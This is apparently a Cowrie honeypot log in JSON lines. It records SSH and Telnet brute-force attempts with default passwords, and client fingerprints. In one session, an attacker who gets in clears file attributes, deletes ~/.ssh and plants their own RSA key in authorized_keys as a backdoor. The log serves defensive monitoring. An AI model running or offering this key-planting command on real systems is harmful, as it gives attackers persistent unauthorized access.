{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":52854,"dst_ip":"1.2.3.4","dst_port":22,"session":"05044f816d8e","protocol":"ssh","message":"New connection: 199.195.253.95:52854 (1.2.3.4:22) [session: 05044f816d8e]","sensor":"my-vps","timestamp":"2025-08-28T18:16:09.667875Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:16:09.677145Z","src_ip":"199.195.253.95","session":"05044f816d8e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:16:09.863495Z","src_ip":"199.195.253.95","session":"05044f816d8e"}
{"eventid":"cowrie.login.failed","username":"git","password":"123123","message":"login attempt [git/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T18:16:10.621891Z","src_ip":"199.195.253.95","session":"05044f816d8e"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:16:11.758382Z","src_ip":"199.195.253.95","session":"05044f816d8e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47252,"dst_ip":"1.2.3.4","dst_port":23,"session":"441efa9241a1","protocol":"telnet","message":"New connection: 212.227.235.229:47252 (1.2.3.4:23) [session: 441efa9241a1]","sensor":"my-vps","timestamp":"2025-08-28T18:18:42.530999Z"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":57991,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ae24bb96b24","protocol":"ssh","message":"New connection: 80.94.95.15:57991 (1.2.3.4:22) [session: 9ae24bb96b24]","sensor":"my-vps","timestamp":"2025-08-28T18:18:43.329006Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T18:18:43.343135Z","src_ip":"80.94.95.15","session":"9ae24bb96b24"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T18:18:43.408414Z","src_ip":"80.94.95.15","session":"9ae24bb96b24"}
{"eventid":"cowrie.login.failed","username":"randall","password":"randall","message":"login attempt [randall/randall] failed","sensor":"my-vps","timestamp":"2025-08-28T18:18:43.725983Z","src_ip":"80.94.95.15","session":"9ae24bb96b24"}
{"eventid":"cowrie.login.failed","username":"randall","password":"randall1","message":"login attempt [randall/randall1] failed","sensor":"my-vps","timestamp":"2025-08-28T18:18:44.794691Z","src_ip":"80.94.95.15","session":"9ae24bb96b24"}
{"eventid":"cowrie.login.failed","username":"randall","password":"randall123","message":"login attempt [randall/randall123] failed","sensor":"my-vps","timestamp":"2025-08-28T18:18:45.862859Z","src_ip":"80.94.95.15","session":"9ae24bb96b24"}
{"eventid":"cowrie.login.failed","username":"randall","password":"randall1234","message":"login attempt [randall/randall1234] failed","sensor":"my-vps","timestamp":"2025-08-28T18:18:46.933627Z","src_ip":"80.94.95.15","session":"9ae24bb96b24"}
{"eventid":"cowrie.login.failed","username":"randall","password":"randall12345","message":"login attempt [randall/randall12345] failed","sensor":"my-vps","timestamp":"2025-08-28T18:18:48.001834Z","src_ip":"80.94.95.15","session":"9ae24bb96b24"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:18:49.069884Z","src_ip":"80.94.95.15","session":"9ae24bb96b24"}
{"eventid":"cowrie.session.closed","duration":13.014152765274048,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:18:55.545074Z","src_ip":"212.227.235.229","session":"441efa9241a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60368,"dst_ip":"1.2.3.4","dst_port":23,"session":"f0243d1a2827","protocol":"telnet","message":"New connection: 212.227.125.160:60368 (1.2.3.4:23) [session: f0243d1a2827]","sensor":"my-vps","timestamp":"2025-08-28T18:20:11.463412Z"}
{"eventid":"cowrie.session.closed","duration":31.407423734664917,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:20:42.870765Z","src_ip":"212.227.125.160","session":"f0243d1a2827"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63392,"dst_ip":"1.2.3.4","dst_port":22,"session":"4637ba3f79b0","protocol":"ssh","message":"New connection: 217.72.205.35:63392 (1.2.3.4:22) [session: 4637ba3f79b0]","sensor":"my-vps","timestamp":"2025-08-28T18:21:11.946035Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:21:11.947127Z","src_ip":"217.72.205.35","session":"4637ba3f79b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":10061,"dst_ip":"1.2.3.4","dst_port":23,"session":"e1f57fbfad7a","protocol":"telnet","message":"New connection: 212.227.235.229:10061 (1.2.3.4:23) [session: e1f57fbfad7a]","sensor":"my-vps","timestamp":"2025-08-28T18:21:15.252735Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44264,"dst_ip":"1.2.3.4","dst_port":22,"session":"29b2716a7919","protocol":"ssh","message":"New connection: 212.227.235.229:44264 (1.2.3.4:22) [session: 29b2716a7919]","sensor":"my-vps","timestamp":"2025-08-28T18:21:16.211416Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:21:16.212478Z","src_ip":"212.227.235.229","session":"29b2716a7919"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T18:21:16.318740Z","src_ip":"212.227.235.229","session":"29b2716a7919"}
{"eventid":"cowrie.login.failed","username":"sol","password":"12345","message":"login attempt [sol/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T18:21:16.640661Z","src_ip":"212.227.235.229","session":"29b2716a7919"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:21:17.749167Z","src_ip":"212.227.235.229","session":"29b2716a7919"}
{"eventid":"cowrie.session.closed","duration":12.534327268600464,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:21:27.786997Z","src_ip":"212.227.235.229","session":"e1f57fbfad7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36236,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ac8fe38a0b5","protocol":"ssh","message":"New connection: 212.227.235.229:36236 (1.2.3.4:22) [session: 5ac8fe38a0b5]","sensor":"my-vps","timestamp":"2025-08-28T18:21:38.968504Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:21:38.969426Z","src_ip":"212.227.235.229","session":"5ac8fe38a0b5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:21:39.219506Z","src_ip":"212.227.235.229","session":"5ac8fe38a0b5"}
{"eventid":"cowrie.login.success","username":"root","password":"ipconfig","message":"login attempt [root/ipconfig] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:21:40.264185Z","src_ip":"212.227.235.229","session":"5ac8fe38a0b5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:21:40.785447Z","src_ip":"212.227.235.229","session":"5ac8fe38a0b5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:21:40.786284Z","src_ip":"212.227.235.229","session":"5ac8fe38a0b5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:21:40.787518Z","src_ip":"212.227.235.229","session":"5ac8fe38a0b5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:21:41.039520Z","src_ip":"212.227.235.229","session":"5ac8fe38a0b5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:21:41.596790Z","src_ip":"212.227.235.229","session":"5ac8fe38a0b5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T18:21:41.597549Z","src_ip":"212.227.235.229","session":"5ac8fe38a0b5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T18:21:41.849715Z","src_ip":"212.227.235.229","session":"5ac8fe38a0b5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:21:41.850875Z","src_ip":"212.227.235.229","session":"5ac8fe38a0b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36250,"dst_ip":"1.2.3.4","dst_port":22,"session":"8559406c4c25","protocol":"ssh","message":"New connection: 212.227.235.229:36250 (1.2.3.4:22) [session: 8559406c4c25]","sensor":"my-vps","timestamp":"2025-08-28T18:21:42.097963Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:21:42.098900Z","src_ip":"212.227.235.229","session":"8559406c4c25"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:21:42.348215Z","src_ip":"212.227.235.229","session":"8559406c4c25"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T18:21:43.388171Z","src_ip":"212.227.235.229","session":"8559406c4c25"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:21:44.641433Z","src_ip":"212.227.235.229","session":"8559406c4c25"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59768,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8843466698e","protocol":"ssh","message":"New connection: 212.227.235.229:59768 (1.2.3.4:22) [session: d8843466698e]","sensor":"my-vps","timestamp":"2025-08-28T18:21:44.895462Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:21:44.896392Z","src_ip":"212.227.235.229","session":"d8843466698e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:21:45.151302Z","src_ip":"212.227.235.229","session":"d8843466698e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:21:46.214818Z","src_ip":"212.227.235.229","session":"d8843466698e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:21:46.471629Z","src_ip":"212.227.235.229","session":"d8843466698e"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:21:46.472797Z","src_ip":"212.227.235.229","session":"5ac8fe38a0b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59794,"dst_ip":"1.2.3.4","dst_port":22,"session":"69b549efd978","protocol":"ssh","message":"New connection: 212.227.235.229:59794 (1.2.3.4:22) [session: 69b549efd978]","sensor":"my-vps","timestamp":"2025-08-28T18:22:03.036230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:22:03.037289Z","src_ip":"212.227.235.229","session":"69b549efd978"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T18:22:03.139948Z","src_ip":"212.227.235.229","session":"69b549efd978"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":58217,"dst_ip":"1.2.3.4","dst_port":22,"session":"28c0dfbf8432","protocol":"ssh","message":"New connection: 80.94.95.15:58217 (1.2.3.4:22) [session: 28c0dfbf8432]","sensor":"my-vps","timestamp":"2025-08-28T18:22:03.185570Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T18:22:03.186493Z","src_ip":"80.94.95.15","session":"28c0dfbf8432"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T18:22:03.236639Z","src_ip":"80.94.95.15","session":"28c0dfbf8432"}
{"eventid":"cowrie.login.success","username":"root","password":"!@#$%^&*","message":"login attempt [root/!@#$%^&*] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:22:03.440990Z","src_ip":"212.227.235.229","session":"69b549efd978"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T18:22:03.484471Z","src_ip":"80.94.95.15","session":"28c0dfbf8432"}
